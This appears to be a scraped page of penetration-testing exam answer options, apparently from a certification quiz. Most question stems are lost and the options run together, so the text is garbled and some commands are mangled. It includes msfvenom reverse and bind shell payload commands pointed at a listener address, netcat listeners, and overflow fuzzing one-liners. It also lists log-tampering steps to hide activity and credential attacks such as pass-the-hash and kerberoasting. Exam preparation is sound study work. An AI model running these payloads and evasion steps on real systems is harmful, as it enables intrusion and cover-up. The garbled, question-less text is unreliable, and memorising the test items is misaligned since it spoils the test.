A. msfvenom --arch x86-64 --platform windows --encoder x86-64/shikata_ga_nai --payload windows/bind_tcp LPORT=443, msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.100 LPORT=8000, C. msfvenom --arch x86-64 --platform windows --payload windows/shell_reverse_tcp LHOST-10.10.10.100 LPORT-4444 EXITFUNC=none, net user add /administrator | hexdump > payload, ./myfile < $(printf ‘A%.0s’ {1.1000}, echo ‘A’ |head -n 1000 |tr -d ‘\n’ | ./myfile, python -c ‘print(“A”*1000)’ > test.txt; cat test.txt >./myfile, ./pattern_create.rb 1000 > test.txt; ./myfile < test.txt, Cloud storage, Email, Domain Name System, Test storage sites, Enterprise mail server, Honeypot, Stand-alone web server, Domain Controller, Switch, SCADA, IoT, Router, Modify files located in the /var/log directory., Use the clear command to remove recent terminal activity., Perform commands under one of the developer accounts., Disable all logging services on the host., BloodHound, Responder, Burp Suite, Hydra, Enumerating cached pages available on web pages, Looking for externally available services, Scanning for exposed ports associated with the domain, Searching for vulnerabilities and potential exploits, mmc.exe, Netstat, Mimikatz, explorer.exe, CME, Running Responder with default settings and using Impacket, Running Nmap with safe scripts enabled and targeting RDP, Running Metasploit utilizing the EternalBlue module, Running Hydra on the local user at one attempt per second, TruffleHog, Postman, Wfuzz, WPScan, msfvenom --arch x86-64 --platform windows --encoder x86-64/shikata_ga_nai --payload windows/bind_tcp LPORT=443, msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.100 LPORT=8000, msfvenom --arch x86-64 --platform windows --payload windows/shell_reverse_tcp LHOST-10.10.10.100 LPORT-4444 EXITFUNC=none, net user add /administrator | hexdump > payload, Deploy a command-and-control server with custom profiles to facilitate execution., Use Python 3 with added testing libraries and script the relevant action to test., Utilize the PowerShell PowerView tool with custom scripting additions based on test results., Implement Atomic Red Team to chain critical TTPs and perform the test., Smishing, Impersonation, Tailgating, Whaling, List database tables, Show logged-in database users, Enumerate privileges, Display available SQL commands, A. Enable promiscuous mode, Modify -Tuning to 1, Verify the ports used, Remove the -evasion flag, Crack the user password for aholliday., Download all TGS tickets for offline processing., Perform a pass-the-hash attack using the hash for aholliday., Perform password spraying., Use only a single redirect to /etc/password., Generate the password using md5sum., Log in to the host using SSH, Change the 1001 entries to 0., Scan the domain controller and locate an RCE using a Metasploit module with a reverse shell, Run Hydra to password spray any dumped credentials from the initial host across subnets, Use BloodHound to look for escalation paths against the AD environment, Find the SYSVOL share for hashes with findstr /i and decrypt using the published key, Network sniffing, IP scanning, Banner grabbing, DNS enumeration, Responder, Metasploit, Netcat, Nmap, nc -lvp 8080, nc -lnvp 443, python3 -m http.server 80, neat -lvp 8080, SAST, SBOM, ICS, SCA, The clients network uses 6GHz and not 5GHz/2.4GHz, The tester misconfigured the capture device, The client provided the wrong SSID for the network, The tester is not using Aircrack-ng, Configure and register a service, Install and run remote desktop software, Set up a script to be run when users log in., Perform a kerberoasting attack on the host, pwinspector -i -o -m 8 -M 16 -1 -u -n -p, B. responder -I eth0, nmap -sV -n -T3 -p 22 --reason, hydra -L root -P /path/to/wordlist -t 3 -M, Find credentials within the SSH daemon, Establish persistence on the host, Add a key to the host for SSH., Harvest users' private keys., A penetration testing company is defining the rules of engagement with a client. Which of the following should the company include?, Non-disclosure agreement, B. Escalation process, C. URL list, Authorization letter, Which of the following differentiates MITRE ATT&CK from PTES?, MITRE ATT&CK emphasizes real-world adversary behavior patterns, while PTES outlines structured test phases, MITRE ATT&CK defines risk scoring models for vulnerabilities, while PTES focuses on defensive controls., MITRE ATT&CK organizes asset inventories, while PTES provides data breach response procedures, MITRE ATT&CK provides detailed exploit code samples, while PTES focuses on threat actor profiles, Enable a host-based firewall on the machine, Remove utilized persistence mechanisms on client systems, Revert configuration changes made during the engagement, Turn off command-and-control infrastructure, pwd.exe, net.exe, sc.ехе, msconfig.exe, Nmap Scripting Engine, Shodan, Impacket, Netcat, Burp Suite, Duplicate the $socket code block and modify $port for each new port variable., Add a new Foreach loop directly beneath the other Foreach loop and enclose with {...}., Add $p in $port to the initial Foreach loop directly following the $range variable., Add $(Each ($p in $port) on the line before $socket and enclose with {....}., . gc * | select "ProjectX", dir /R | findstr "ProjectX", Get-ChildItem * | Select-String "ProjectX", gci -Path . -Recurse | Select-String -Pattern "ProjectX", Sensitive documents on a public cloud, Open ports on the cloud infrastructure, Repositories with secret keys, SSL certificates on websites, A. Deploy a rootkit., B. Drop a beacon., C. Start a web shell., D. Schedule a task., The SNMP daemon delayed its response beyond Nmap's UDP scan timeout., Nmap marked the port as open|filtered because no response was received., The scanned host applied rate limiting to its responses to prevent UDP fingerprinting., The Nmap scan lacked root privileges, which reduced packet inspection accuracy., Proof of concept, B. Risk scoring, Attack narrative, Executive summary, A penetration tester must gain entry to a client's office building without raising attention. Which of the following should be the tester's first step?, A. Interacting with security employees to clone a badge, B. Trying to enter the back door after hours on a weekend, C. Collecting building blueprints to run a site survey, D. Conducting surveillance of the office to understand foot traffic, A. Resolve-DnsName -Name company.com -Type A, B. dig axfr company.com @spf.company.com, nslookup -q=txt _dmarc.company.com, D. dig MX company.com, A. Send a smishing message., B. Utilize a USB hardware keylogger., C. Send a phishing email to the employee., D. Engage in shoulder surfing., A. TruffleHog for collecting credentials, B. Shodan for identifying potential targets, C. Gophish for sending phishing emails, D. Maltego for organizing targets, E. theHarvester for discovering additional targets, F. Evilginx for handling legitimate authentication requests through a proxy, Which of the following would most likely reduce the possibility of a client rejecting the final deliverable for a penetration test?, A. Goal reprioritization, B. Stakeholder alignment, C. Non-disclosure agreement, D. Business impact analysis, A. Intercept proxy chains with tcpdump., B. Create a reverse shell payload with msfvenom., C. Generate a silver ticket with Impacket., D. Conduct a relay attack using Responder., A. Captive portal, B. Signal jamming, C. WPS PIN attack, D. Channel scanning, A. WHOIS, B. Censys.io, C. SpiderFoot, D. theHarvester, A. cat data.csv | grep -v "IP" | cut -d"," -f 3,4 | sed -e 's/,//', B. cat data.csv | find . -iname Username,Password, C. cat data.csv | grep 'username|Password’, D. cat data.csv | grep -i "admin" | grep -v "WINS212\|HRDB\|WAS01\|10.1ll.41.74\|10.13.9.212\|192.168.23.13", Which of the following is the most likely LOLBin to be used to perform an exfiltration on a Microsoft Windows environment?, A. procdump.exe, B. msbuild.exe, C. bitsadmin.exe, D. cscript.exe, 22, 80, 123, 6000, A. Installing a systemd service that connects back to the C2 server, B. Injecting a reverse shell payload into an existing running process, C. Creating a new cron job that launches a shell on reboot, D. Adding a new user account with sudo privileges for future access, A. JWT manipulation, B. Cookie poisoning, C. Session fixation, D. Collision attack, A. Wireshark, B. theHarvester, C. Recon-ng, D. WiGLE.net, A. Launch a payload using msfvenom and upload it to the /admin directory., B. Review the contents of /cgi-bin/debug.sh., C. Use NFS client tools against exposed rpcbind., D. Attempt a brute-force attack against OpenSSH 7.2p2., A. Credential dumping, B. Local file inclusion, C. Unquoted service path injection, D. Process hijacking, A. Create a malicious certificate., B. Dump credentials from memory., C. Craft Kerberos tickets., D. List potential privilege escalation paths., A. Staging payloads to make bind shells, B. Creating a backdoor on several weak targets, C. Adding a password for the root user on the targets, D. Generating SSH keys to decrypt data on each target, A. Log off and log on with the hacker account., B. Attempt to add another user., C. Bypass the execution policy., D. Add a malicious printer driver., A. Deploying an evil twin with a WiFi Pineapple, B. Performing a password spraying attack with Hydra, C. Setting up a captive portal using SET, D. Deauthenticating clients using aireplay-ng, A. Modifying the WAF, B. Utilizing a CSRF attack, C. Changing the robots.txt file, D. Leveraging a competing provider, A. Reset file and folder permissions on the web server., B. Obtain a valid X.509 certificate., C. Spoof the server's MAC address., D. Use a legacy browser to access the page., A. Revert configuration changes., B. Preserve artifacts., C. Remove persistence mechanisms., D. Secure the data destruction., A. Gophish, B. Recon-ng, C. BeEF, D. Evilginx, E. Yersinia

by

Leaderboard

Visual style

Options

Switch template

Continue editing: ?